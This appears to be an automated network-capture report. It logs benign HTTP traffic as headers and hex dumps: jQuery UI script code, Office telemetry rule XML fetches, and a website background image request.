                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 29 3f 7b 77 69 64 74 68 3a 74 2e 77 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 68 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 6c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 28 29 7d 7d 3a 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 2c 6f 66 66 73 65 74 3a 7b 74 6f 70 3a 65 2e 70 61 67 65 59 2c 6c 65 66 74 3a 65 2e 70 61 67 65 58 7d 7d 3a 7b 77 69 64 74 68 3a 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 68 65 69 67 68 74 3a 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 6f 66 66 73 65 74 3a 74 2e 6f 66 66 73 65 74 28 29 7d 2c 76 5b 30 5d 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 26 26 28 66 2e 61 74 3d 22 6c 65 66 74 20 74 6f 70
                                                                                                                                                                                                                              Data Ascii: )?{width:t.width(),height:t.height(),offset:{top:t.scrollTop(),left:t.scrollLeft()}}:e.preventDefault?{width:0,height:0,offset:{top:e.pageY,left:e.pageX}}:{width:t.outerWidth(),height:t.outerHeight(),offset:t.offset()},v[0].preventDefault&&(f.at="left top
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 65 6c 65 6d 57 69 64 74 68 3a 6c 2c 65 6c 65 6d 48 65 69 67 68 74 3a 61 2c 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 3a 69 2c 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 3a 6f 2c 63 6f 6c 6c 69 73 69 6f 6e 48 65 69 67 68 74 3a 73 2c 6f 66 66 73 65 74 3a 5b 63 5b 30 5d 2b 75 5b 30 5d 2c 63 5b 31 5d 2b 75 5b 31 5d 5d 2c 6d 79 3a 66 2e 6d 79 2c 61 74 3a 66 2e 61 74 2c 77 69 74 68 69 6e 3a 79 2c 65 6c 65 6d 3a 72 7d 29 7d 29 2c 66 2e 75 73 69 6e 67 26 26 28 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 67 2e 6c 65 66 74 2d 68 2e 6c 65 66 74 2c 69 3d 65 2b 64 2d 6c 2c 6e 3d 67 2e 74 6f 70 2d 68 2e 74 6f 70 2c 6f 3d 6e 2b 70 2d 61 2c 73 3d 7b 74 61 72 67 65 74 3a 7b 65 6c 65 6d 65 6e 74 3a 76 2c 6c 65 66 74 3a 67 2e 6c 65 66 74 2c 74 6f 70
                                                                                                                                                                                                                              Data Ascii: elemWidth:l,elemHeight:a,collisionPosition:i,collisionWidth:o,collisionHeight:s,offset:[c[0]+u[0],c[1]+u[1]],my:f.my,at:f.at,within:y,elem:r})}),f.using&&(t=function(t){var e=g.left-h.left,i=e+d-l,n=g.top-h.top,o=n+p-a,s={target:{element:v,left:g.left,top
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 74 2c 65 29 7b 76 61 72 20 69 3d 65 2e 77 69 74 68 69 6e 2c 6e 3d 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2b 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 2c 6f 3d 69 2e 77 69 64 74 68 2c 69 3d 69 2e 69 73 57 69 6e 64 6f 77 3f 69 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 69 2e 6f 66 66 73 65 74 2e 6c 65 66 74 2c 73 3d 74 2e 6c 65 66 74 2d 65 2e 63 6f 6c 6c 69 73 69 6f 6e 50 6f 73 69 74 69 6f 6e 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 72 3d 73 2d 69 2c 73 3d 73 2b 65 2e 63 6f 6c 6c 69 73 69 6f 6e 57 69 64 74 68 2d 6f 2d 69 2c 6c 3d 22 6c 65 66 74 22 3d 3d 3d 65 2e 6d 79 5b 30 5d 3f 2d 65 2e 65 6c 65 6d 57 69 64 74 68 3a 22 72 69 67 68 74 22 3d 3d 3d 65 2e 6d 79 5b 30 5d 3f 65 2e 65 6c 65 6d 57 69 64 74 68 3a 30 2c 61 3d 22 6c 65 66 74 22 3d 3d 3d 65 2e 61 74 5b 30 5d 3f 65 2e
                                                                                                                                                                                                                              Data Ascii: t,e){var i=e.within,n=i.offset.left+i.scrollLeft,o=i.width,i=i.isWindow?i.scrollLeft:i.offset.left,s=t.left-e.collisionPosition.marginLeft,r=s-i,s=s+e.collisionWidth-o-i,l="left"===e.my[0]?-e.elemWidth:"right"===e.my[0]?e.elemWidth:0,a="left"===e.at[0]?e.
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 26 26 78 28 74 29 2e 74 72 69 67 67 65 72 28 22 62 6c 75 72 22 29 7d 2c 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 53 63 72 6f 6c 6c 20 50 61 72 65 6e 74 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 78 2e 66 6e 2e 73 63 72 6f 6c 6c 50 61 72 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 63
                                                                                                                                                                                                                              Data Ascii: &&x(t).trigger("blur")},/*! * jQuery UI Scroll Parent 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */x.fn.scrollParent=function(t){var e=this.c


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              122192.168.2.64986113.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 411
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                              x-ms-request-id: 750d06c7-901e-0083-2d5b-20bb55000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180412Z-r1755647c66ww2rh494kknq3r0000000098000000000dv66
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              123192.168.2.64986013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 485
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                              x-ms-request-id: cc65e471-501e-008c-15b8-20cd39000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180412Z-r1755647c66ww2rh494kknq3r000000009c0000000005pg2
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              124192.168.2.64986213.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 470
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                              x-ms-request-id: 97d7c53d-b01e-001e-2be3-200214000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180412Z-r1755647c66z4pt7cv1pnqayy400000008h0000000009u7f
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              125192.168.2.64986413.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                              x-ms-request-id: 55f0c68d-501e-008f-5d50-239054000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180412Z-r1755647c66dj7986akr8tvaw400000007s000000000afy7
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              126192.168.2.64986513.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 502
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                              x-ms-request-id: 6acd84c4-d01e-0066-15aa-20ea17000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180412Z-r1755647c66sxs9zhy17bg185w00000009d0000000003t33
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              127192.168.2.649868141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC912OUTGET /wp-content/uploads/2020/11/wave-background-dark.jpg HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/wp-content/uploads/elementor/css/post-7.css
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1; _ga_VZFP9C0M5Y=GS1.1.1729706650.1.0.1729706650.0.0.0; _ga=GA1.1.2026524419.1729706650
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC481INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:12 GMT
                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                              Content-Length: 9727
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                              Cf-Polished: status=not_needed
                                                                                                                                                                                                                              ETag: "66f49b7a-25ff"
                                                                                                                                                                                                                              Last-Modified: Wed, 25 Sep 2024 23:23:38 GMT
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614822
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5f15b4d474e-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC888INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 01 07 07 07 07 07 07 08 08 08 08 0b 0b 0a 0b 0b 10 0e 0d 0d 0e 10 18 11 12 11 12 11 18 24 16 1a 16 16 1a 16 24 20 26 1f 1d 1f 26 20 39 2d 27 27 2d 39 42 37 34 37 42 4f 47 47 4f 64 5f 64 83 83 b0 ff c2 00 11 08 02 c4 05 a0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 05 06 04 07 ff da 00 08 01 01 00 00 00 00 fe 14 06 80 28 02 80 50 0a 00 a0 14 03 40 05 01 40 00 14 0a 00 28 05 00 d0 02 80 50 05 0f 28 06 80 28 02 80 50 0a 01 40 14 03 40
                                                                                                                                                                                                                              Data Ascii: JFIF$$ && 9-''-9B747BOGGOd_d$$ && 9-''-9B747BOGGOd_d"(P@@(P((P@@
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: 14 00 01 40 a0 02 80 50 0d 00 2f 98 00 00 00 0d 00 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 00 28 0a 00 28 05 00 d0 0b db c6 00 00 00 01 a0 0a 01 40 14 02 80 50 0a 00 d0 01 40 a0 00 05 02 80 14 01 40 34 1b ed d1 e0 00 00 00 00 d0 02 80 50 0a 00 a0 14 02 80 34 00 a0 28 00 02 80 a0 02 80 50 0d 3a f6 d0 f0 00 00 00 00 1a 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 50 28 01 40 14 0d 76 ed 41 e0 00 00 00 00 34 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 a0 28 00 a0 14 6f b7 52 83 c0 00 00 00 00 1a 00 a0 14 02 80 28 05 00 a0 0d 00 28 0a 00 00 50 28 01 40 17 a7 6e 80 a1 e0 00 00 00 00 0d 00 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 00 28 0a 00 28 2f 5e db 00 a3 c0 00 00 00 00 06 80 28 05 00 a0 0a 01 40 28 03 40 0a 02 80 14 aa aa 28 11 10 17 af 7a 50 0a 78 00 00 00
                                                                                                                                                                                                                              Data Ascii: @P/(@(@((@P@@4P4(P:((P(@vA4(((oR((P(@n(@(@((/^(@(@(zPx
                                                                                                                                                                                                                              2024-10-23 18:04:12 UTC1369INData Raw: a0 14 2f 7e e2 8a 00 05 00 00 2f cc 00 df 6d 00 00 00 00 00 00 00 14 a0 00 0a 4e 7c c0 1d 7b 50 0a 00 01 7b f7 a0 a0 00 00 0a 00 af 9a 82 de dd 00 00 00 00 00 00 00 00 00 00 0b 49 cf 9d 0b df 60 0a 00 2c 57 7e d4 0a 00 50 00 a0 00 7c d0 df 6d 80 00 00 00 00 00 00 00 00 00 0a 03 9e 2b 5d aa 80 a0 00 5e bf a3 41 14 00 0a 00 0a 00 3e 6d 7b 74 00 00 00 00 00 00 00 00 16 50 00 01 42 63 5d 40 05 21 40 75 ef b0 02 80 14 08 14 00 07 ce f4 eb 40 00 00 00 00 00 00 00 00 28 00 02 86 bb b9 e4 00 50 03 a7 7e 80 00 0a 00 0a 00 28 0f 16 81 60 16 01 60 16 01 60 16 01 60 16 00 50 00 00 2f 4e a1 cb 20 16 80 6b f4 74 00 05 02 80 00 02 80 1e 42 59 42 59 42 59 42 59 42 59 42 59 42 59 42 59 42 59 40 05 8b 2a 59 41 db a0 19 c6 40 00 d7 7e a0 00 0a 05 00 00 d0 22 83 c8 00 00 00
                                                                                                                                                                                                                              Data Ascii: /~/mN|{P{I`,W~P|m+]^A>m{tPBc]@!@u@(P~(````P/N ktBYBYBYBYBYBYBYBYBY@*YA@~"
